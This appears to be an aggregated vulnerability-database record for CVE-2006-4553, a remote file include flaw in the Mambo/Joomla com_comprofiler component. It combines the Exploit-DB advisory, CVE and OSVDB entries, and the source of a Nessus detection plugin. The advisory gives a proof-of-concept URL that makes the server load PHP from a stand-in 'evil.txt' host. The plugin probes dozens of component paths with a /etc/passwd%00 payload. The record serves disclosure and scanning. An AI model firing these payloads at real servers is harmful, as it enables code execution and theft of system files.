Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability
2006-08-26T00:00:00
ID EDB-ID:28437 Type exploitdb Reporter Matdhule Modified 2006-08-26T00:00:00
Description
Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability. CVE-2006-4553. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/19725/info
The Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
Version 1.0 RC2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.example.com/evil.txt?
{"id": "EDB-ID:28437", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability", "description": "Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability. CVE-2006-4553. Webapps exploit for php platform", "published": "2006-08-26T00:00:00", "modified": "2006-08-26T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28437/", "reporter": "Matdhule", "references": [], "cvelist": ["CVE-2006-4553"], "lastseen": "2016-02-03T08:10:23", "viewCount": 20, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-02-03T08:10:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4553"]}, {"type": "osvdb", "idList": ["OSVDB:28241"]}, {"type": "nessus", "idList": ["MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL"]}], "modified": "2016-02-03T08:10:23", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://www.exploit-db.com/download/28437/", "sourceData": "source: http://www.securityfocus.com/bid/19725/info\r\n\r\nThe Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.\r\n\r\nVersion 1.0 RC2 is vulnerable to this issue; other versions may also be affected.\r\n\r\nhttp://www.example.com/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.example.com/evil.txt?", "osvdbidlist": ["28241"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "PHP remote file inclusion vulnerability in plugin.class.php in the com_comprofiler Components 1.0 RC2 for Mambo and Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-06T00:04:00", "title": "CVE-2006-4553", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4553"], "modified": "2018-10-17T21:37:00", "cpe": ["cpe:/a:joomla:com_comprofiler_component:1.0_rc2", "cpe:/a:mambo:com_comprofiler_component:1.0_rc2"], "id": "CVE-2006-4553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4553", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mambo:com_comprofiler_component:1.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:com_comprofiler_component:1.0_rc2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4553"], "edition": 1, "description": "## Vulnerability Description\nCommunity Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to plugin.class.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.0.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCommunity Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to plugin.class.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://[attacker]/evil.txt?\n## References:\nVendor URL: http://www.joomla.org/\nVendor Specific News/Changelog Entry: http://www.joomlapolis.com/content/view/1538/37/\nVendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,84436.0.html\nVendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html\n[Secunia Advisory ID:21636](https://secuniaresearch.flexerasoftware.com/advisories/21636/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0488.html\n[CVE-2006-4553](https://vulners.com/cve/CVE-2006-4553)\nBugtraq ID: 19725\n", "modified": "2006-08-25T04:19:27", "published": "2006-08-25T04:19:27", "href": "https://vulners.com/osvdb/OSVDB:28241", "id": "OSVDB:28241", "type": "osvdb", "title": "Community Builder for Joomla plugin.class.php mosConfig_absolute_path Variable Remote File Inclusion", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-20T12:09:16", "description": "A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2006-07-15T00:00:00", "title": "Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "modified": "2006-07-15T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/22049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22049);\n script_version(\"1.110\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2006-3396\",\n \"CVE-2006-3530\",\n \"CVE-2006-3556\",\n \"CVE-2006-3748\",\n \"CVE-2006-3749\",\n \"CVE-2006-3750\",\n \"CVE-2006-3751\",\n \"CVE-2006-3773\",\n \"CVE-2006-3774\",\n \"CVE-2006-3846\",\n \"CVE-2006-3947\",\n \"CVE-2006-3949\",\n \"CVE-2006-3980\",\n \"CVE-2006-3995\",\n \"CVE-2006-4074\",\n \"CVE-2006-4130\",\n \"CVE-2006-4195\",\n \"CVE-2006-4270\",\n \"CVE-2006-4288\",\n \"CVE-2006-4553\",\n \"CVE-2006-4858\",\n \"CVE-2006-5045\",\n \"CVE-2006-5048\",\n \"CVE-2006-5519\",\n \"CVE-2006-6962\",\n \"CVE-2007-1702\",\n \"CVE-2007-2005\",\n \"CVE-2007-2144\",\n \"CVE-2007-2319\",\n \"CVE-2007-3130\",\n \"CVE-2007-5310\",\n \"CVE-2007-5412\",\n \"CVE-2007-5457\",\n \"CVE-2008-0567\",\n \"CVE-2008-5789\",\n \"CVE-2008-5790\",\n \"CVE-2008-5793\",\n \"CVE-2008-6841\",\n \"CVE-2010-2918\"\n );\n script_bugtraq_id(\n 18705,\n 18808,\n 18876,\n 18919,\n 18924,\n 18968,\n 18991,\n 19037,\n 19042,\n 19044,\n 19047,\n 19100,\n 19217,\n 19222,\n 19223,\n 19224,\n 19233,\n 19373,\n 19465,\n 19505,\n 19574,\n 19581,\n 19725,\n 20018,\n 20667,\n 23125,\n 23408,\n 23490,\n 23529,\n 24342,\n 25959,\n 26002,\n 26044,\n 27531,\n 28942,\n 30093,\n 32190,\n 32192,\n 32194\n );\n script_xref(name:\"EDB-ID\", value:\"1959\");\n script_xref(name:\"EDB-ID\", value:\"2020\");\n script_xref(name:\"EDB-ID\", value:\"2023\");\n script_xref(name:\"EDB-ID\", value:\"2029\");\n script_xref(name:\"EDB-ID\", value:\"2083\");\n script_xref(name:\"EDB-ID\", value:\"2089\");\n script_xref(name:\"EDB-ID\", value:\"2125\");\n script_xref(name:\"EDB-ID\", value:\"2196\");\n script_xref(name:\"EDB-ID\", value:\"2205\");\n script_xref(name:\"EDB-ID\", value:\"2206\");\n script_xref(name:\"EDB-ID\", value:\"2207\");\n script_xref(name:\"EDB-ID\", value:\"2214\");\n script_xref(name:\"EDB-ID\", value:\"2367\");\n script_xref(name:\"EDB-ID\", value:\"2613\");\n script_xref(name:\"EDB-ID\", value:\"3567\");\n script_xref(name:\"EDB-ID\", value:\"3703\");\n script_xref(name:\"EDB-ID\", value:\"3753\");\n script_xref(name:\"EDB-ID\", value:\"4497\");\n script_xref(name:\"EDB-ID\", value:\"4507\");\n script_xref(name:\"EDB-ID\", value:\"4521\");\n script_xref(name:\"EDB-ID\", value:\"5020\");\n script_xref(name:\"EDB-ID\", value:\"5497\");\n script_xref(name:\"EDB-ID\", value:\"6003\");\n script_xref(name:\"EDB-ID\", value:\"7038\");\n script_xref(name:\"EDB-ID\", value:\"7039\");\n script_xref(name:\"EDB-ID\", value:\"7040\");\n\n script_name(english:\"Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities\");\n script_summary(english:\"Attempts to read a local file using Mambo / Joomla components and modules.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439035/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439451/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439618/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439963/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439997/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/440881/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441533/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441538/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441541/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/444425/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0607-exploits/smf.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the PHP 'register_globals' setting or contact the product's\nvendor to see if an upgrade exists.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Extcalendar RFI\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mambo_detect.nasl\", \"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\n# Generate a list of paths to check.\nmambo = get_dirs_from_kb(appname:'mambo_mos', port:port);\nif (isnull(mambo)) mambo = make_list();\n\njoomla = make_list();\njoomla_installs = get_installs(\n app_name : \"Joomla!\",\n port : port\n);\n\nif (joomla_installs[0] == IF_OK)\n{\n foreach install (joomla_installs[1])\n {\n dir = install['path'];\n joomla = make_list(dir, joomla);\n }\n}\n\ndirs = make_list(mambo, joomla);\n\nif (max_index(dirs) == 0)\n audit(AUDIT_WEB_APP_NOT_INST, \"Joomla! / Mambo\", port);\n\n# Vulnerable scripts.\n# - components.\nncoms = 0;\ncom = make_array();\n# - A6MamboCredits\ncom[ncoms++] = \"/administrator/components/com_a6mambocredits/admin.a6mambocredits.php\";\n# - Art*Links\ncom[ncoms++] = \"/components/com_artlinks/artlinks.dispnew.php\";\n# - Chrono Forms\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS/File.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php\";\n# - Clickheat\ncom[ncoms++] = \"/administrator/components/com_clickheat/install.clickheat.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/_main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/overview/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php\";\n# - Community Builder\ncom[ncoms++] = \"/administrator/components/com_comprofiler/plugin.class.php\";\n# - Coppermine Photo Gallery\ncom[ncoms++] = \"/components/com_cpg/cpg.php\";\n# - DBQ Manager\ncom[ncoms++] = \"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php\";\n# - ExtCalendar\ncom[ncoms++] = \"/components/com_extcalendar/extcalendar.php\";\n# - Feederator\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/subscription.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/tmsp.php\";\n# - Galleria\ncom[ncoms++] = \"/components/com_galleria/galleria.html.php\";\n# - Hashcash\ncom[ncoms++] = \"/components/com_hashcash/server.php\";\n# - HTMLArea3\ncom[ncoms++] = \"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php\";\n# - JD-Wiki\ncom[ncoms++] = \"/components/com_jd-wiki/lib/tpl/default/main.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/dwpage.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/wantedpages.php\";\n# - Joomla Flash Uploader\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php\";\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php\";\n# - JoomlaPack\ncom[ncoms++] = \"/administrator/components/com_jpack/includes/CAltInstaller.php\";\n# - Joomla-Visites\ncom[ncoms++] = \"/administrator/components/com_joomla-visites/core/include/myMailer.class.php\";\n# - Link Directory\ncom[ncoms++] = \"/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php\";\n# - LoudMouth\ncom[ncoms++] = \"/components/com_loudmouth/includes/abbc/abbc.class.php\";\n# - Mambatstaff\ncom[ncoms++] = \"/components/com_mambatstaff/mambatstaff.php\";\n# - MambelFish\ncom[ncoms++] = \"/administrator/components/com_mambelfish/mambelfish.class.php\";\n# - Mambo Gallery Manager\ncom[ncoms++] = \"/administrator/components/com_mgm/help.mgm.php\";\n# - Mosets Tree\ncom[ncoms++] = \"/components/com_mtree/Savant2/Savant2_Plugin_textarea.php\";\n# - mp3_allopass\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass.php\";\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass-error.php\";\n# - Multibanners\ncom[ncoms++] = \"/administrator/components/com_multibanners/extadminmenus.class.php\";\n# - PCCookbook\ncom[ncoms++] = \"/components/com_pccookbook/pccookbook.php\";\n# - Peoplebook\ncom[ncoms++] = \"/administrator/components/com_peoplebook/param.peoplebook.php\";\n# - perForms\ncom[ncoms++] = \"/components/com_performs/performs.php\";\n# - phpShop\ncom[ncoms++] = \"/administrator/components/com_phpshop/toolbar.phpshop.html.php\";\n# - PollXT\ncom[ncoms++] = \"/administrator/components/com_pollxt/conf.pollxt.php\";\n# - Recly!Competitions\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/add.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/competitions.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/settings/settings.php\";\n# - Remository\ncom[ncoms++] = \"/administrator/components/com_remository/admin.remository.php\";\n# - rsGallery\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.php\";\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.html.php\";\n# - Security Images\ncom[ncoms++] = \"/administrator/components/com_securityimages/configinsert.php\";\ncom[ncoms++] = \"/administrator/components/com_securityimages/lang.php\";\n# - Serverstat\ncom[ncoms++] = \"/administrator/components/com_serverstat/install.serverstat.php\";\n# - SiteMap\ncom[ncoms++] = \"/components/com_sitemap/sitemap.xml.php\";\n# - SMF Forum\ncom[ncoms++] = \"/components/com_smf/smf.php\";\n# - Taskhopper\ncom[ncoms++] = \"/components/com_thopper/inc/contact_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/itemstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/projectstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/request_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/responses_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/timelog_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/urgency_type.php\";\n# - User Home Pages\ncom[ncoms++] = \"/administrator/components/com_uhp/uhp_config.php\";\ncom[ncoms++] = \"/administrator/components/com_uhp2/footer.php\";\n# - VideoDB\ncom[ncoms++] = \"/administrator/components/com_videodb/core/videodb.class.xml.php\";\n# - WmT Portfolio\ncom[ncoms++] = \"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php\";\n# - modules.\nnmods = 0;\nmod = make_array();\n# - Autostand\nmod[nmods++] = \"/mod_as_category.php\";\nmod[nmods++] = \"/mod_as_category/mod_as_category.php\";\n# - FlatMenu\nmod[nmods++] = \"/mod_flatmenu.php\";\n# - MambWeather\nmod[nmods++] = \"/MambWeather/Savant2/Savant2_Plugin_options.php\";\n\n\n# Loop through each directory.\ninfo = \"\";\ncontents = \"\";\nforeach dir (list_uniq(dirs))\n{\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<ncoms; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + com[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + com[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n\n for (i=0; i<nmods; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + \"/modules/\" + mod[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + \"/modules/\" + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n}\n\nif (info)\n{\n if (empty_or_null(contents)) contents = 'The response output includes an error message which indicates that the installed component is affected. Below is the response : \\n\\n' + res;\n\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : \"/etc/passwd\",\n request : split(info),\n output : contents,\n attach_type : 'text/plain'\n );\n exit(0);\n}\nelse\n exit(0, \"No affected components were found on the web server on port \"+port+\".\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}